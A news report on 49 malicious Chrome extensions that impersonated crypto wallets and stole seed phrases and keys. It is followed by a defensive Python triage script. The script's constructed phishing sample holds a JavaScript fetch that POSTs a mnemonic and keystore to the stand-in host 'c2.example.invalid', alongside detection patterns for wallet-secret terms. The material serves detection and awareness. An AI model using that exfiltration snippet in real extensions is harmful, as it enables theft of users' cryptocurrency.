Google has removed 49 Chrome browser extensions from its Web Store that impersonated cryptocurrency wallets but contained malicious code to harvest sensitive information and steal digital currency.
The 49 browser add-ons, which are believed to be the work of Russian threat actors, were identified by researchers from MyCrypto and PhishFort.
According to Harry Denley, director of security at MyCrypto, the extensions are phishing for secrets like mnemonic phrases, private keys, and keystore files. When a user enters these details, the extension sends an HTTP POST request to its backend, where the attackers receive the secrets and drain the accounts.
The extensions in question were removed within 24 hours of being reported to Google. But according to an analysis by MyCrypto, these extensions were available on the Web Store as early as February 2020.
All the extensions functioned the same way; the only difference was which cryptocurrency wallet brand was impersonated, including Ledger, Trezor, Jaxx, Electrum, MyEtherWallet, MetaMask, Exodus, and KeepKey. The phished data was sent to 14 unique command-and-control (C2) servers.
The researchers believe that the criminals are either targeting high-value accounts only or have to sweep the compromised accounts manually.
Some of the extensions even carried five-star reviews, increasing the chance that an unsuspecting user would install them.
Some users also left legitimate reviews warning that the extensions were malicious, either because they had fallen victim to the phishing themselves or simply to warn the community not to install them.
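As an added, defender-side example (not code from the article, MyCrypto or PhishFort), the script below performs a static triage of an unpacked Chrome extension for the pattern described above: source strings suggesting collection of mnemonic phrases, private keys or keystore files, combined with an HTTP POST to an external host, plus broad host permissions in the manifest. The sample manifests, scripts, extension names and the host `c2.example.invalid` are all constructed placeholders, not indicators from the report.

```python
"""Static triage of an unpacked Chrome extension for wallet-secret exfiltration traits.

Flags an extension when it (1) requests broad host permissions, (2) contains
strings suggesting it collects wallet secrets, and (3) POSTs data to an external
host. The heuristic is deliberately conservative: only (2) together with (3)
marks the extension as suspicious, since wallet UIs legitimately mention
"private key" in help text, and many benign extensions POST to their own API.
"""
import json
import re
from urllib.parse import urlparse

# Words that a wallet-phishing form would collect (case-insensitive).
SECRET_TERMS = re.compile(r"mnemonic|seed\s*phrase|private\s*key|keystore", re.I)
# fetch("https://host/...", { ... method: "POST" ... })  -> captures the URL
FETCH_POST = re.compile(
    r"""fetch\(\s*['"](https?://[^'"]+)['"].{0,300}?method\s*:\s*['"]POST['"]""",
    re.I | re.S,
)
# xhr.open("POST", "https://host/...")  -> captures the URL
XHR_POST = re.compile(r"""\.open\(\s*['"]POST['"]\s*,\s*['"](https?://[^'"]+)['"]""", re.I)
# Host patterns that let an extension read/modify every site the user visits.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def external_post_hosts(js_source, allowlist=()):
    """Return sorted hostnames that receive HTTP POSTs, minus an allowlist."""
    hosts = set()
    for pattern in (FETCH_POST, XHR_POST):
        for url in pattern.findall(js_source):
            host = urlparse(url).hostname or ""
            if host and host not in allowlist:
                hosts.add(host)
    return sorted(hosts)


def triage(manifest, scripts, allowlist=()):
    """Triage one extension: manifest dict plus {filename: js_source}."""
    # MV2 puts host patterns in "permissions"; MV3 uses "host_permissions".
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    source = "\n".join(scripts.values())
    findings = {
        "name": manifest.get("name", "<unnamed>"),
        "broad_host_permissions": sorted(perms & BROAD_HOSTS),
        "secret_terms": sorted({m.lower() for m in SECRET_TERMS.findall(source)}),
        "external_post_hosts": external_post_hosts(source, allowlist),
    }
    findings["suspicious"] = bool(findings["secret_terms"] and findings["external_post_hosts"])
    return findings


# --- Constructed sample extensions (hypothetical; not real Web Store listings) ---
PHISHING_MANIFEST = json.loads("""{
  "manifest_version": 2,
  "name": "Example Wallet Helper (constructed sample)",
  "permissions": ["<all_urls>", "storage"]
}""")
PHISHING_SCRIPTS = {
    "popup.js": """
    const phrase = document.querySelector('#mnemonic').value;
    const ks = document.querySelector('#keystore-file').value;
    fetch("https://c2.example.invalid/collect", {
      method: "POST",
      headers: {"Content-Type": "application/json"},
      body: JSON.stringify({mnemonic: phrase, keystore: ks})
    });
    """
}

BENIGN_MANIFEST = json.loads("""{
  "manifest_version": 3,
  "name": "Example Price Ticker (constructed sample)",
  "host_permissions": ["https://api.example-ticker.invalid/*"]
}""")
BENIGN_SCRIPTS = {
    "background.js": """
    // Help text only; the extension never asks for a private key.
    fetch("https://api.example-ticker.invalid/prices", {method: "GET"});
    """
}

if __name__ == "__main__":
    for manifest, scripts in ((PHISHING_MANIFEST, PHISHING_SCRIPTS), (BENIGN_MANIFEST, BENIGN_SCRIPTS)):
        print(json.dumps(triage(manifest, scripts), indent=2))
```

Run against a real unpacked extension directory by loading `manifest.json` and the `.js` files it references; the `allowlist` argument suppresses the vendor's own API hosts so that only unexpected POST destinations remain.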
If you suspect you have become a victim of a malicious browser extension and lost funds, it is advised that you file a report at CryptoScamDB.